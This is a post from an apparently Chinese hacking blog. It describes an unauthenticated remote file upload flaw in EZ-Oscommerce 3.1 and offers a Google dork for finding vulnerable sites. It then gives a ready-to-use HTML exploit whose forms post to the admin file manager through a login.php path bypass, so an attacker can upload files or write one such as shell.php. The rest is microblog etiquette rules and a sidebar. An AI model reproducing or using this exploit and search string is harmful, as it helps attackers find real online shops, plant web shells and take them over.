凌风[0x0F]'s BloG

Enjoy In Hacking

黑客在线工具 联系方式 移到底部 登录

EZ-Oscommerce 3.1程序针对其上传进行严格验证和过滤,可以上传任意恶意代码。

google :Powered by osCommerce 或者Customized by EZ-Oscommerce

Exploite:

<html><head><title> EZ-Oscommerce 3.1 - Remote File Upload </title></head>            <br><br><u>UPLOAD FILE:</u><br>            <form name="file" action="http://site/admin/file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data">            <input type="file" name="file_1"><br>            <input name="submit" type="submit" value="   Upload   " >            </form>            <br><u>CREATE FILE:</u><br>            <form name="new_file" action="http://site/admin/file_manager.php/login.php?action=save" method="post">            FILE NAME:<br>            <input type="text" name="filename"> (ex. shell.php)<br>FILE CONTENTS:<br>            <textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>            <input name="submit" type="submit" value="   Save   " >            </form>      

[微博礼仪规范]

微博礼仪规范

我们真诚地欢迎光临本微博的每一位网友,但是这里需要一个文明、健康的互动环境。为此,我们希望:

  • 1、遵守国家法律,请不要发布违反国家法律的内容;
  • 2、遵守社会公德,请不要使用不文明字词作为个人昵称,发布消息攻击、谩骂他人;
  • 3、避免信息垃圾,请不要在短时间内反复发布同一条消息; 请不要发布、传播谣言;

在微博里,收听的权力在听众手里,如果您的行为让他人不适,最终将会让你失去所有听众。

来,说说你在做什么,想什么



验证码

 
 

博主:0x0F

专注于WEB安全,寻志同道合的朋友一起交流技术。QQ:unMD5(50a9780c2be657b465f74e56f1d6e429)

我的话题

最新广播

我的收藏

腾讯微博